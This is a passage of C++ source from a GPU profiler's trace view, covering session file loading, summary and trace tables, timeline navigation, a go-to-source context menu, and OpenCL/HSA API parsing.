m_pCurrentSession->ResetOccupancyFileLoad();
if (m_pCurrentSession->m_pParentData->m_filePath.exists())
{
int thisSessionMajor = m_pCurrentSession->GetVersionMajor();
int thisSessionMinor = m_pCurrentSession->GetVersionMinor();
if ((thisSessionMajor > RCP_MAJOR_VERSION) || (thisSessionMajor == RCP_MAJOR_VERSION && thisSessionMinor > RCP_MINOR_VERSION))
{
// Output a message to the user
errorMessage = GP_Str_NewerTraceSession;
// Hide the progress dialog
afProgressBarWrapper::instance().hideProgressBar();
retVal = false;
}
else
{
LoadSessionUsingBackendParser(m_pCurrentSession->m_pParentData->m_filePath);
// if we didn't load symbol info from .atp file, try loading it from .st file
if (m_symbolTableMap.isEmpty())
{
osFilePath stFilePath = m_pCurrentSession->m_pParentData->m_filePath;
stFilePath.setFileExtension(L"st");
if (stFilePath.exists())
{
LoadSessionUsingBackendParser(stFilePath);
}
}
// if we didn't load CL perfmarker info from .atp file, try loading it from .clperfmarker file
if (!m_perfMarkersAdded)
{
osFilePath perfMarkerFilePath = m_pCurrentSession->m_pParentData->m_filePath;
perfMarkerFilePath.setFileExtension(L"clperfmarker");
if (perfMarkerFilePath.exists())
{
LoadSessionUsingBackendParser(perfMarkerFilePath);
}
}
DoneParsingATPFile();
// Load the summary view
LoadSummary(sessionInnerPage);
afProgressBarWrapper::instance().hideProgressBar();
}
}
}
}
if ((m_pSummaryView != nullptr) && (m_pTraceTabView != nullptr) && (m_pSessionTabWidget != nullptr))
{
m_pSummaryView->DisplaySummaryPageType(sessionInnerPage);
// Find the summary view tab index
int summaryTabIndex = -1;
for (int i = 0; i < m_pTraceTabView->count(); i++)
{
if (m_pTraceTabView->tabText(i) == GPU_STR_TraceViewSummary)
{
summaryTabIndex = i;
break;
}
}
if (summaryTabIndex >= 0)
{
m_pTraceTabView->setCurrentIndex(summaryTabIndex);
}
// Set the timeline as the current index
m_pSessionTabWidget->setCurrentIndex(0);
}
return retVal;
}
void TraceView::LoadSummary(afTreeItemType summaryItemType)
{
if (m_pSummarizer == nullptr)
{
m_pSummarizer = new CLSummarizer(m_pCurrentSession);
}
m_pSummarizer->CreateSummaryPages();
if (m_pTraceTabView != nullptr && m_pSummarizer->GetSummaryPagesMap().count() != 0)
{
if (m_pSummaryView == nullptr)
{
m_pSummaryView = new SummaryView(this);
connect(m_pSummaryView, SIGNAL(LinkClicked(const QString&, unsigned int, unsigned int, AnalyzerHTMLViewType)),
this, SLOT(SummaryPageLinkClickedHandler(const QString&, unsigned int, unsigned int, AnalyzerHTMLViewType)));
}
GT_IF_WITH_ASSERT(m_pSummaryView->LoadSession(m_pCurrentSession, m_pSummarizer))
{
int indexOfSummary = m_pTraceTabView->addTab(m_pSummaryView, GPU_STR_TraceViewSummary);
m_pTraceTabView->setCurrentIndex(indexOfSummary);
m_pSummaryView->DisplaySummaryPageType(summaryItemType);
}
}
}
void TraceView::AddTraceTable(TraceTableModel* pModel, unsigned int threadId)
{
// Sanity check:
GT_IF_WITH_ASSERT(pModel != nullptr)
{
// Check if the table contain API calls. If the table is empty (due to limited API calls that we load),
// do not add it to the tab view:
if (!pModel->IsEmpty())
{
// Initialize the model:
bool rc = pModel->InitializeModel();
GT_ASSERT(rc);
// Update the UI:
// handles [BUG438186]
            // don't create a trace view tab if the model doesn't have items (only known via reserved items at this point)
GT_IF_WITH_ASSERT(qApp != nullptr && (pModel->GetReservedApiCallsTraceItems() > 0))
{
QString strTabCaption = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadId);
TraceTable* pNewTable = new TraceTable(this, threadId);
// Do not set this delegate item, it causes performance overhead which we cannot afford:
// pNewTable->setItemDelegate(new acItemDelegate);
pNewTable->setContextMenuPolicy(Qt::CustomContextMenu);
connect(pNewTable, SIGNAL(customContextMenuRequested(const QPoint&)), this, SLOT(TraceTableContextMenuHandler(const QPoint&)));
connect(pNewTable, SIGNAL(clicked(QModelIndex)), this, SLOT(TraceTableMouseClickedHandler(const QModelIndex&)));
connect(pNewTable, SIGNAL(doubleClicked(const QModelIndex&)), this, SLOT(TraceTableMouseDoubleClickedHandler(const QModelIndex&)));
connect(pNewTable, SIGNAL(entered(const QModelIndex&)), this, SLOT(TraceTableMouseEnteredHandler(const QModelIndex&)));
pNewTable->setModel(pModel);
if (m_api == APIToTrace_HSA)
{
pNewTable->SetHiddenColumnsList(s_hsaHiddenColumns);
}
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
m_pTraceTabView->addTab(pNewTable, strTabCaption);
pNewTable->expandAll();
}
}
}
}
}
void TraceView::Clear()
{
m_pTimeline->reset();
if (m_pSummaryView != nullptr)
{
m_pSummaryView->Reset();
}
SAFE_DELETE(m_pSummarizer);
m_pTraceTabView->clear();
if (m_pCurrentSession != nullptr)
{
m_pCurrentSession->FlushData();
}
m_modelMap.clear();
m_hostBranchMap.clear();
m_symbolTableMap.clear();
m_pOpenCLBranch = nullptr;
m_pHSABranch = nullptr;
m_pHSADataTransferBranch = nullptr;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
it->m_pTransferBranch = nullptr;
}
m_hsaDataTransferBranches.clear();
m_oclCtxMap.clear();
m_oclQueueMap.clear();
m_hsaQueueMap.clear();
m_oclThreadOccIndexMap.clear();
m_hsaThreadOccIndexMap.clear();
m_timestampStack.clear();
m_titleStack.clear();
m_branchStack.clear();
m_perfMarkersAdded = false;
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
}
SymbolInfo* TraceView::GetSymbolInfo(int threadId, int callIndex)
{
SymbolInfo* pRetVal = nullptr;
if (callIndex >= 0 && m_symbolTableMap.contains(threadId))
{
QList<SymbolInfo*> list = m_symbolTableMap[threadId];
if (list.count() > callIndex)
{
pRetVal = list[callIndex];
}
}
return pRetVal;
}
bool TraceView::SessionHasSymbolInformation()
{
return m_symbolTableMap.isEmpty();
}
void TraceView::TraceTableMouseClickedHandler(const QModelIndex& modelIndex)
{
TraceTableItem* item = static_cast<TraceTableItem*>(modelIndex.internalPointer());
QTreeView* table = dynamic_cast<QTreeView*>(sender());
if (table != nullptr)
{
if (modelIndex.column() == TraceTableModel::TRACE_OCCUPANCY_COLUMN)
{
IOccupancyInfoDataHandler* occInfo = item->GetOccupancyInfo();
if (occInfo != nullptr)
{
m_strOccupancyKernelName = QString::fromStdString(occInfo->GetKernelName());
// get the api index from the Index column (column 0)
QString strCallIndex;
strCallIndex = item->GetColumnData(TraceTableModel::TRACE_INDEX_COLUMN).toString();
bool ok;
int callIndex = strCallIndex.toInt(&ok);
// if we got a valid call index, then show the occupancy view
if (ok)
{
m_currentDisplayedOccupancyKernel = QString::fromStdString(occInfo->GetKernelName());
QString strErrorMessageOut;
connect(ProfileManager::Instance(), SIGNAL(OccupancyFileGenerationFinished(bool, const QString&, const QString&)), this, SLOT(OnOccupancyFileGenerationFinish(bool, const QString&, const QString&)));
// Generate occupancy page
bool retVal = ProfileManager::Instance()->GenerateOccupancyPage(m_pCurrentSession, occInfo, callIndex, strErrorMessageOut);
if (!retVal)
{
Util::ShowErrorBox(strErrorMessageOut);
}
}
}
}
else if (modelIndex.column() == TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN)
{
acTimelineItem* deviceBlockItem = item->GetDeviceBlock();
if (deviceBlockItem != nullptr)
{
// at this point, we know that the user has clicked a device block cell
m_pTimeline->ZoomToItem(deviceBlockItem, true);
}
}
}
}
void TraceView::TraceTableMouseDoubleClickedHandler(const QModelIndex& modelIndex)
{
// Get the activated item:
TraceTableItem* pItem = static_cast<TraceTableItem*>(modelIndex.internalPointer());
GT_IF_WITH_ASSERT(pItem != nullptr)
{
// Zoom the timeline into the double-clicked item:
m_pTimeline->ZoomToItem(pItem->GetTimelineItem(), true);
// Display the item properties:
DisplayItemInPropertiesView(pItem->GetTimelineItem());
}
}
void TraceView::TraceTableMouseEnteredHandler(const QModelIndex& modelIndex)
{
TraceTableItem* item = static_cast<TraceTableItem*>(modelIndex.internalPointer());
// change the mouse cursor to the hand cursor when hovering over a device block item or a kernel occupancy item
QTreeView* table = dynamic_cast<QTreeView*>(sender());
if (table != nullptr)
{
IOccupancyInfoDataHandler* occInfo = item->GetOccupancyInfo();
acTimelineItem* deviceBlockItem = item->GetDeviceBlock();
if ((occInfo != nullptr && modelIndex.column() == TraceTableModel::TRACE_OCCUPANCY_COLUMN) || (deviceBlockItem != nullptr && modelIndex.column() == TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN))
{
// we are over a cell with either a kernel occupancy figure or a device block pItem
table->setCursor(Qt::PointingHandCursor);
return;
}
table->setCursor(Qt::ArrowCursor);
}
}
void TraceView::TimelineItemClickedHandler(acTimelineItem* pItem)
{
// show the corresponding API trace pItem when clicking a timeline pItem
if (pItem != nullptr)
{
// Update properties with the details of this pItem:
DisplayItemInPropertiesView(pItem);
m_areTimelinePropertiesSet = true;
// first get the correct pItem (if user clicks a timeline pItem for a device)
HostAPITimelineItem* hostApiItem = dynamic_cast<HostAPITimelineItem*>(pItem);
PerfMarkerTimelineItem* pPerfItem = dynamic_cast<PerfMarkerTimelineItem*>(pItem);
TraceTableItem* pTableItem = nullptr;
if (hostApiItem != nullptr)
{
pItem = hostApiItem->hostItem();
}
APITimelineItem* apiItem = dynamic_cast<APITimelineItem*>(pItem);
if (apiItem != nullptr)
{
pTableItem = apiItem->traceTableItem();
}
if (pPerfItem != nullptr)
{
pTableItem = pPerfItem->traceTableItem();
}
if (pItem && pItem->parentBranch() != nullptr)
{
QTreeView* treeview = nullptr;
acTimelineBranch* branch = pItem->parentBranch();
int tabIndex = -1;
while (branch != nullptr && tabIndex == -1)
{
QString strTabTextToFind = branch->text();
tabIndex = GetTabIndex(strTabTextToFind);
branch = branch->parentBranch();
}
if (tabIndex != -1)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
treeview = dynamic_cast<QTreeView*>(m_pTraceTabView->currentWidget());
}
if (treeview != nullptr && pTableItem != nullptr)
{
// select the api that corresponds to the timeline pItem clicked
QModelIndexList selectionList = treeview->model()->match(treeview->model()->index(0, 0), Qt::UserRole, pTableItem->GetUniqueId(), 1, Qt::MatchExactly | Qt::MatchRecursive);
treeview->setCurrentIndex(selectionList.first());
}
}
}
}
void TraceView::TimelineBranchClickedHandler(acTimelineBranch* branch)
{
// show the corresponding API trace tab when clicking a timeline branch
int tabIndex = -1;
while (branch != nullptr && tabIndex == -1)
{
QString strTabTextToFind = branch->text();
tabIndex = GetTabIndex(strTabTextToFind);
branch = branch->parentBranch();
}
if (tabIndex != -1)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
}
}
HSADispatchTimelineItem* CheckBranchForItem(acTimelineBranch* pBranch, unsigned int callIndex, bool recurse = true)
{
if (nullptr != pBranch)
{
for (int i = 0; i < pBranch->itemCount(); i++)
{
HSADispatchTimelineItem* hsaDispatchItem = dynamic_cast<HSADispatchTimelineItem*>(pBranch->getTimelineItem(i));
if (nullptr != hsaDispatchItem && callIndex == (unsigned int)hsaDispatchItem->apiIndex())
{
return hsaDispatchItem;
}
}
if (recurse)
{
for (int i = 0; i < pBranch->subBranchCount(); i++)
{
HSADispatchTimelineItem* item = CheckBranchForItem(pBranch->getSubBranch(i), callIndex, recurse);
if (nullptr != item)
{
return item;
}
}
}
}
return nullptr;
}
void TraceView::SummaryPageLinkClickedHandler(const QString& strPageName, unsigned int threadID, unsigned int callIndex, AnalyzerHTMLViewType viewType)
{
QString strHostThread = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadID);
// determine if the page containing the link is an HSA page (by looking at the prefix of the page)
QString strPrefix = GPU_STR_TraceViewOpenCL;
QStringList pageNameTokens = strPageName.split(' ');
if (pageNameTokens.count() > 0)
{
if (pageNameTokens[0] == GPU_STR_TraceViewHSA)
{
strPrefix = GPU_STR_TraceViewHSA;
}
}
switch (viewType)
{
case AnalyzerHTMLViewType_TimelineHost:
case AnalyzerHTMLViewType_TimelineDevice:
{
acTimelineBranch* pBranch = m_pTimeline->getBranchFromText(strHostThread, false);
if (nullptr != pBranch)
{
// find subbranch with the specified prefix name
for (int i = 0; i < pBranch->subBranchCount(); i++)
{
if (pBranch->getSubBranch(i)->text() == strPrefix)
{
pBranch = pBranch->getSubBranch(i);
break;
}
}
}
if (nullptr != pBranch)
{
// get the specified timeline item
acTimelineItem* pItem = pBranch->getTimelineItem(callIndex);
if (nullptr != pItem)
{
// if the item has a device item, then show that
DispatchAPITimelineItem* pEnqueueItem = dynamic_cast<DispatchAPITimelineItem*>(pItem);
if ((AnalyzerHTMLViewType_TimelineDevice == viewType) && (nullptr != pEnqueueItem) && (nullptr != pEnqueueItem->deviceItem()))
{
m_pTimeline->ZoomToItem(pEnqueueItem->deviceItem(), true);
}
else
{
m_pTimeline->ZoomToItem(pItem, true);
}
}
}
break;
}
case AnalyzerHTMLViewType_TimelineDeviceNoAPI:
{
// there is not a host-side API for this -- most likely an HSA kernel dispatch
acTimelineBranch* pBranch = m_pTimeline->getBranchFromText(GPU_STR_TraceViewHSA, false, false);
if (nullptr != pBranch)
{
HSADispatchTimelineItem* pItem = CheckBranchForItem(pBranch, callIndex);
if (nullptr != pItem)
{
m_pTimeline->ZoomToItem(pItem, true);
}
}
break;
}
case AnalyzerHTMLViewType_Trace:
{
QTreeView* treeview = nullptr;
for (int tabIndex = 0; tabIndex < m_pTraceTabView->count(); tabIndex++)
{
if (m_pTraceTabView->tabText(tabIndex) == strHostThread)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
treeview = dynamic_cast<QTreeView*>(m_pTraceTabView->currentWidget());
break;
}
}
if (treeview != nullptr)
{
QString strUniqueId = strPrefix;
strUniqueId.append('.').append(QString::number(callIndex));
QModelIndexList selectionList = treeview->model()->match(treeview->model()->index(0, 0), Qt::UserRole, QVariant::fromValue(strUniqueId), 1, Qt::MatchExactly | Qt::MatchRecursive);
if (!selectionList.empty())
{
treeview->setCurrentIndex(selectionList.first());
}
else
{
                    // TODO: display a message that you can't navigate to the API because it wasn't loaded (it was an API after the 200k limit)
}
}
break;
}
default:
break;
}
}
void TraceView::TraceTableContextMenuHandler(const QPoint& pt)
{
TraceTable* table = dynamic_cast<TraceTable*>(sender());
if (table != nullptr)
{
// get the thread and callindex
int threadId = table->GetThreadId();
QString strMenuText(GPU_STR_TraceViewGoToSource);
bool isSourceCodeEnabled = false;
bool isCopyEnabled = false;
bool isSelectAllEnabled = false;
bool isExpandEnabled = false;
QModelIndex index = table->indexAt(pt);
QString strUniqueId = table->model()->data(index, Qt::UserRole).toString();
QStringList uniqueIdTokens = strUniqueId.split(".");
int row = -1;
AGP_TODO("need to revisit if symbol info becomes available for HSA APIs")
isExpandEnabled = table->ShouldExpandBeEnabled();
if (uniqueIdTokens.count() > 1 && (uniqueIdTokens[0] == GPU_STR_TraceViewOpenCL || uniqueIdTokens[0] == GPU_STR_TraceViewHSA))
{
bool ok;
row = uniqueIdTokens[1].toInt(&ok);
if (!ok)
{
row = -1;
}
}
// Check if copy and select all actions are enabled:
isCopyEnabled = !table->selectionModel()->selectedIndexes().isEmpty();
isSelectAllEnabled = (table->model()->rowCount() > 0);
if (row >= 0)
{
// get the symbol info for that call, store it in m_pSymbolInfo for use in the menu trigger handler
m_pSymbolInfo = GetSymbolInfo(threadId, row);
}
if (m_pSymbolInfo != nullptr)
{
isSourceCodeEnabled = true;
}
else
{
// change the caption if the option to allow source code navigation is not enabled (gives a hint to the user)
if (!SessionHasSymbolInformation())
{
strMenuText.append(QString(" (Enable navigation to source code on the \"%1\" project setting page.)").arg(Util::ms_APP_TRACE_OPTIONS_PAGE));
}
isSourceCodeEnabled = false;
}
// disable context menu actions on selection of more then 1 row (not copy and select all)
bool isMultiRowSelection = (table->NumOfSelectedRows() > 1);
m_pGotoSourceAction->setText(strMenuText);
m_pGotoSourceAction->setEnabled(isSourceCodeEnabled && !isMultiRowSelection);
m_pExpandAllAction->setEnabled(isExpandEnabled);
m_pCollapseAllAction->setEnabled(isExpandEnabled);
m_pZoomInTimelineAction->setEnabled(isCopyEnabled && !isMultiRowSelection);
m_pCopyAction->setEnabled(isCopyEnabled);
m_pSelectAllAction->setEnabled(isSelectAllEnabled);
m_pTraceTableContextMenu->exec(acMapToGlobal(table, pt));
}
}
void TraceView::OnGotoSource()
{
if (m_pSymbolInfo != nullptr)
{
osFilePath filePath(acQStringToGTString(m_pSymbolInfo->FileName()));
if (filePath.isEmpty())
{
QString strExtraInfo;
strExtraInfo = GP_Str_InvalidDebugInfo;
// if file name, api name, symbol name, and line number are all empty, then that is an indication that there is no entry in the .st file for the selected API
if (m_pSymbolInfo->ApiName().isEmpty() && m_pSymbolInfo->SymbolName().isEmpty() && m_pSymbolInfo->LineNumber() == 0)
{
strExtraInfo += QString(GP_Str_AppTerminatedUnexpectedly).arg(Util::ms_ENABLE_TIMEOUT_OPTION);
}
Util::ShowWarningBox(QString(GP_Str_NoSourceInfoForSelectedAPI).arg(strExtraInfo));
}
else if (filePath.exists() && filePath.isRegularFile())
{
afApplicationCommands* pApplicationCommands = afApplicationCommands::instance();
GT_IF_WITH_ASSERT(pApplicationCommands != nullptr)
{
pApplicationCommands->OpenFileAtLine(filePath, m_pSymbolInfo->LineNumber(), -1);
}
}
else
{
// check to see if this file is a file from an installed sample file (in this case, the path in the debug info might not match the path to the file on disk)
filePath = Util::GetInstalledPathForSampleFile(filePath);
if (filePath.exists() && filePath.isRegularFile())
{
afApplicationCommands* pApplicationCommands = afApplicationCommands::instance();
GT_IF_WITH_ASSERT(pApplicationCommands != nullptr)
{
pApplicationCommands->OpenFileAtLine(filePath, m_pSymbolInfo->LineNumber(), -1);
}
}
else
{
Util::ShowWarningBox(QString(GP_Str_CantAccessSourceForSelectedAPI).arg(acGTStringToQString(filePath.asString())));
}
}
m_pSymbolInfo = nullptr;
}
}
void TraceView::SetAPINum(osThreadId threadId, unsigned int apiNum)
{
TraceTableModel* pTableModel = nullptr;
if (m_modelMap.contains(threadId))
{
pTableModel = m_modelMap[threadId];
}
else
{
pTableModel = new TraceTableModel(this);
pTableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, pTableModel);
}
GT_IF_WITH_ASSERT(pTableModel != nullptr)
{
pTableModel->SetAPICallsNumber(apiNum);
}
}
bool TraceView::CheckStopParsing(quint64 curEndTime)
{
bool stopParsing = false;
    // On Windows, we are limited to a 2GB memory size, so we limit the API calls loaded to 200K.
    // On Linux this limitation is not relevant, so we do not stop parsing:
#if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS
stopParsing = m_parseCallsCounter >= s_MAX_TRACE_ENTRIES;
if (stopParsing)
{
// CODEXL-3550: If the API limit was reached, continue to parse additional items (HSA kernel timestamps, perf markers, etc.), up to the point (in time) where api parsing stopped.
// This ensures that the partial timeline shown will at least be complete (in the sense that all items in the given timespan will be shown):
stopParsing = ((0 == m_maxTimestampWhenParsingStopped || curEndTime != std::numeric_limits<quint64>::max()) && curEndTime > m_maxTimestampWhenParsingStopped);
}
if (stopParsing && !m_alreadyDisplayedAPILimitMessage)
{
// We ask the user if they want to continue loading the data at their own risk:
QString userMessage = QString(GPU_STR_APICallsAmountExceedsTheLimitQuestion).arg(s_MAX_TRACE_ENTRIES);
int userAnswer = acMessageBox::instance().question(afGlobalVariablesManager::ProductNameA(), userMessage, QMessageBox::No | QMessageBox::Yes);
m_shouldStopParsing = stopParsing = (userAnswer == QMessageBox::Yes);
m_alreadyDisplayedAPILimitMessage = true;
if (m_shouldStopParsing)
{
m_maxTimestampWhenParsingStopped = curEndTime;
}
}
else if (stopParsing && m_alreadyDisplayedAPILimitMessage)
{
stopParsing = m_shouldStopParsing;
}
#else
(void)(curEndTime); // unused
#endif
return stopParsing;
}
acTimelineBranch* TraceView::AddHSADataTransferBranch(QString srcHandle, QString srcName, QString destHandle, QString destName)
{
acTimelineBranch* returnBranch = GetHSADataTransferBranch(srcHandle, destHandle);
if (returnBranch == nullptr)
{
returnBranch = new(std::nothrow) acTimelineBranch();
if (nullptr != returnBranch)
{
HSADataTransferBranchInfo dataTransferBranchInfo;
dataTransferBranchInfo.m_sourceHandle = srcHandle;
dataTransferBranchInfo.m_sourceName = srcName;
dataTransferBranchInfo.m_destinationHandle = destHandle;
dataTransferBranchInfo.m_destinationName = destName;
dataTransferBranchInfo.m_pTransferBranch = returnBranch;
dataTransferBranchInfo.m_pTransferBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
QString branchText = srcHandle + " (" + srcName + ")" +" -> " + destHandle + " (" + destName + ")";
dataTransferBranchInfo.m_pTransferBranch->setText(branchText);
m_hsaDataTransferBranches.push_back(dataTransferBranchInfo);
}
}
return returnBranch;
}
acTimelineBranch* TraceView::GetHSADataTransferBranch(QString src, QString dest)
{
acTimelineBranch* returnBranch = nullptr;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
if (src == it->m_sourceHandle && dest == it->m_destinationHandle)
{
returnBranch = it->m_pTransferBranch;
break;
}
}
return returnBranch;
}
void TraceView::OnParseCallHandler(AtpInfoType apiType, bool& stopParsing)
{
m_parseCallsCounter++;
void* pPtr;
if (!AtpUtils::Instance()->IsModuleLoaded())
{
AtpUtils::Instance()->LoadModule();
}
AtpDataHandlerFunc pAtpDataHandler_func = AtpUtils::Instance()->GetAtpDataHandlerFunc();
if (nullptr != pAtpDataHandler_func)
{
pAtpDataHandler_func(&pPtr);
IAtpDataHandler* pAtpDataHandler = reinterpret_cast<IAtpDataHandler*>(pPtr);
switch (apiType)
{
case OPENCL_INFO:
{
m_api = APIToTrace_OPENCL;
ICLAPIInfoDataHandler* clApiInfoHandler = pAtpDataHandler->GetCLApiInfoDataHandler();
stopParsing = CheckStopParsing(clApiInfoHandler->GetApiInfoDataHandler()->GetApiEndTime());
if (!stopParsing)
{
HandleCLAPIInfo(clApiInfoHandler);
}
}
break;
case HSA_INFO:
{
m_api = APIToTrace_HSA;
IHSAAPIInfoDataHandler* hsaApiInfoHandler = pAtpDataHandler->GetHSAApiInfoDataHandler();
stopParsing = CheckStopParsing(hsaApiInfoHandler->GetApiInfoDataHandler()->GetApiEndTime());
if (!stopParsing)
{
HandleHSAAPIInfo(hsaApiInfoHandler);
}
}
break;
case PERF_MARKER_ENTRY:
{
IPerfMarkerInfoDataHandler* perMarkerApiInfoDataHandler = pAtpDataHandler->GetPerfMarkerInfoDataHandler();
stopParsing = CheckStopParsing(perMarkerApiInfoDataHandler->GetPerfMarkerTimestamp());
if (!stopParsing)
{
HandlePerfMarkerEntry(perMarkerApiInfoDataHandler);
}
}
break;
case SYMBOL_ENTRY:
{
AGP_TODO("should check the module of pSymFileEntry and match it up to that module's APIs. This will be needed to properly support multi-module traces (i.e. traces that contain both HSA and OCL)")
ISymbolFileEntryInfoDataHandler* symbolFileEntryHandler = pAtpDataHandler->GetSymbolFileEntryInfoDataHandler();
stopParsing = CheckStopParsing(std::numeric_limits<quint64>::max());
if (!stopParsing)
{
HandleSymFileEntry(symbolFileEntryHandler);
}
}
break;
default:
break;
}
}
}
void TraceView::OnSetApiNumCallHandler(osThreadId threadId, unsigned int apiNum)
{
this->SetAPINum(threadId, apiNum);
}
void TraceView::OnParserProgressCallHandler(const char* strProgressMessage, unsigned int uiCurItem, unsigned int uiTotalItems)
{
gtString localProgressMsg;
afProgressBarWrapper& theProgressBarWrapper = afProgressBarWrapper::instance();
localProgressMsg.fromASCIIString(strProgressMessage);
// If this is the first item we're reporting to the progress indicator, or if the
// progress dialog is not shown (was hidden by some other stage of the load?)
if (uiCurItem == 0 || theProgressBarWrapper.IsDlgShown() == false)
{
// Make sure the progress dialog is displayed
theProgressBarWrapper.ShowProgressDialog(uiCurItem, uiTotalItems);
theProgressBarWrapper.setProgressText(localProgressMsg);
// Store the message displayed on the progress dialog for later comparison to avoid unnecessary updates
if (nullptr != strProgressMessage)
{
m_currentProgressMessage = strProgressMessage;
}
}
// Update the progress message only if it has changed
if (nullptr != strProgressMessage && m_currentProgressMessage != strProgressMessage)
{
theProgressBarWrapper.setProgressText(localProgressMsg);
m_currentProgressMessage = strProgressMessage;
}
theProgressBarWrapper.updateProgressBar(uiCurItem);
}
acTimelineBranch* TraceView::GetHostBranchForAPI(osThreadId threadId, const QString& branchText)
{
acTimelineBranch* retVal = nullptr;
// first add the root branch, if necessary
QString hostThreadLabel = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadId);
acTimelineBranch* rootBranch = nullptr;
if (m_hostBranchMap.contains(threadId))
{
rootBranch = m_hostBranchMap[threadId];
}
if (rootBranch == nullptr)
{
rootBranch = new acTimelineBranch();
rootBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
rootBranch->setText(hostThreadLabel);
m_hostBranchMap.insert(threadId, rootBranch);
}
retVal = rootBranch;
if (!branchText.isEmpty())
{
// now add the API branch, if necessary
retVal = rootBranch->getSubBranchFromText(branchText, false);
if (retVal == nullptr)
{
retVal = new acTimelineBranch();
retVal->SetBGColor(QColor::fromRgb(230, 230, 230));
retVal->setText(branchText);
rootBranch->addSubBranch(retVal);
}
}
return retVal;
}
bool TraceView::LoadSessionUsingBackendParser(const osFilePath& sessionFile)
{
bool retVal = false;
if (!AtpUtils::Instance()->IsModuleLoaded())
{
AtpUtils::Instance()->LoadModule();
}
AtpParserFunc parserFunc = AtpUtils::Instance()->GetAtpParserFunctionPointer();
if (nullptr != parserFunc)
{
AtpUtils::Instance()->AddToCallBackHandlerList(this);
std::string sessionFileAsString = sessionFile.asString().asASCIICharArray();
retVal = parserFunc(sessionFileAsString.c_str(), OnParse, SetApiNum, ReportProgressOnParsing);
AtpUtils::Instance()->RemoveHandlerFromCallBackHandlerList(this);
}
return retVal;
}
void TraceView::HandleCLAPIInfo(ICLAPIInfoDataHandler* pClApiInfo)
{
IAPIInfoDataHandler* pApiInfo = pClApiInfo->GetApiInfoDataHandler();
osThreadId threadId = pApiInfo->GetApiThreadId();
TraceTableModel* tableModel = nullptr;
acTimelineItem* deviceBlockItem = nullptr;
IOccupancyInfoDataHandler* occupancyInfo = nullptr;
if (m_modelMap.contains(threadId))
{
tableModel = m_modelMap[threadId];
}
else
{
tableModel = new TraceTableModel(this);
// Show all columns for CL API:
tableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, tableModel);
}
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, GPU_STR_TraceViewOpenCL);
GT_ASSERT(hostBranch != nullptr);
unsigned int apiID = pClApiInfo->GetCLApiId();
std::string strComment = pClApiInfo->GetCLApiComment();
if (!strComment.empty())
{
std::string argList = pApiInfo->GetApiArgListString();
argList.append(" /* ").append(strComment).append(" */");
}
QString apiName;
if (apiID < CL_FUNC_TYPE_Unknown)
{
apiName = CLAPIDefs::Instance()->GetOpenCLAPIString(CL_FUNC_TYPE(apiID));
}
else
{
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
quint64 itemStartTime = pApiInfo->GetApiStartTime();
quint64 itemEndTime = pApiInfo->GetApiEndTime();
// check for reasonable timestamps
GT_ASSERT((itemEndTime >= itemStartTime) && itemStartTime != 0);
APITimelineItem* pAPITimelineItem = nullptr;
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
if (m_lastDeviceItemIdx != -1 && (apiID == CL_FUNC_TYPE_clFinish || apiID == CL_FUNC_TYPE_clWaitForEvents || apiID == CL_FUNC_TYPE_clGetEventInfo))
{
QString syncParams = QString::fromStdString(pApiInfo->m_ArgList);
QString enqueueParams = tableModel->data(tableModel->index(m_lastDeviceItemIdx, TraceTableModel::TRACE_PARAMETERS_COLUMN), Qt::DisplayRole).toString();
if (apiID == CL_FUNC_TYPE_clFinish)
{
// if the cmdQ of the clFinish call matches the cmdQ of the last enqueue call, then set the completion latency for the enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
if (syncParamList.first().trimmed() == enqParamList.first().trimmed())
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
else if (apiID == CL_FUNC_TYPE_clWaitForEvents)
{
// if the event list of the clWaitForEvents call contains the event of the last enqueue call, then set the completion latency for the enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
enqueueParams = enqParamList.last().trimmed();
int beginIndex = enqueueParams.indexOf('[');
int endIndex = enqueueParams.indexOf(']');
enqueueParams = enqueueParams.mid(beginIndex + 1, endIndex - beginIndex - 1);
syncParams = syncParamList.last().trimmed();
beginIndex = syncParams.indexOf('[');
endIndex = syncParams.indexOf(']');
syncParams = syncParams.mid(beginIndex + 1, endIndex - beginIndex - 1);
syncParamList = syncParams.split(',');
if (syncParamList.contains(enqueueParams.trimmed()))
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
else if (apiID == CL_FUNC_TYPE_clGetEventInfo)
{
// if clGetEventInfo indicates COMPLETE and the event matches the event of the last enqueue call, then set the completion latency for the enqueue call
if (syncParams.contains("[CL_COMPLETE]"))
{
// check if the event here matches the event of the last enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
syncParams = syncParamList[0].trimmed();
enqueueParams = enqParamList.last().trimmed();
if (enqueueParams.contains(syncParams))
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
}
}
#endif
